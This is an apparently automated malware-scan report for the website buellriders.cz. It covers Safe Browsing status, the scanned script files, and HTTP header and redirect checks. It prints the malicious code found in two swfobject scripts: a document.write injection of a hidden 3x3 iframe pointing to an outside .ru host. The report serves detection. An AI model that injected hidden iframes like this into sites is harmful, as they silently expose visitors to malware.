Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buellriders.cz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://buellriders.cz/ | 200 OK Content-Length: 19461 Content-Type: text/html | clean |
http://buellriders.cz/plugins/system/jceutilities/js/mediaobject.js | 200 OK Content-Length: 3866 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/jceutilities/js/jquery-126.js | 200 OK Content-Length: 31034 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/jceutilities/js/jceutilities-217.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://buellriders.cz/test404page.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://buellriders.cz/media/system/js/caption.js | 200 OK Content-Length: 1962 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/jcemediabox/js/jcemediabox.js?version=114 | 200 OK Content-Length: 54889 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 8843 Content-Type: application/javascript | clean |
http://buellriders.cz/templates/aluma_photography/js/lytebox.js | 200 OK Content-Length: 32768 Content-Type: application/javascript | clean |
http://buellriders.cz/modules/mod_jsn_imageshow_pro/jsn_imageshow_pro/swfobject.js | 200 OK Content-Length: 7043 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 Antivirus reports:
Hidden iFrame found. size: 3x3 src: http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8 <iframe src="http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://buellriders.cz/modules/mod_jsn_imageshow_pro/jsn_imageshow_pro/swfobject_addon.js | 200 OK Content-Length: 1003 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function jsnAddEvent(target, event, func){ if (target.addEventListener){ target.addEventListener(event, func, false); return true; } else if (target.attachEvent){ var result = target.attachEvent("on"+event, func); return result; } else { return false; } } function registerSWFObject(so, container) { isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1, isAX = typeof window.ActiveXObject != "undefine function writeSWFObject() { so.write(container); document.getElementById(container).style.visibility="visible"; } document.getElementById(container).style.visibility="hidden"; jsnAddEvent(window, "load", writeSWFObject); } else { so.write(container); } };document.write('<iframe src="http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 3x3 src: http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8 <iframe src="http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"> | ||
http://buellriders.cz/templates/aluma_photography/js/s5_textmenu.js | 200 OK Content-Length: 1435 Content-Type: application/javascript | clean |
http://buellriders.cz/templates/aluma_photography/js/s5_effects.js | 200 OK Content-Length: 4667 Content-Type: application/javascript | clean |
http://buellriders.cz/templates/aluma_photography/js/s5_fading_no_moo_menu.js | 200 OK Content-Length: 58749 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buellriders.cz
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Dec 2014 16:33:08 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 17 Dec 2014 16:33:08 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 77e2a04d2aa41957aa6ad3cbff16a556=i27fbj78ekq3d7rl1j03bvjeq3; path=/
X-Powered-By: PHP/5.4.33-1~dotdeb.0
GET / HTTP/1.1
Host: buellriders.cz
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Dec 2014 16:33:08 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 17 Dec 2014 16:33:08 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 77e2a04d2aa41957aa6ad3cbff16a556=i27fbj78ekq3d7rl1j03bvjeq3; path=/
X-Powered-By: PHP/5.4.33-1~dotdeb.0
Second query (visit from search engine):
GET / HTTP/1.1
Host: buellriders.cz
Referer: http://www.google.com/search?q=buellriders.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: buellriders.cz
Referer: http://www.google.com/search?q=buellriders.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.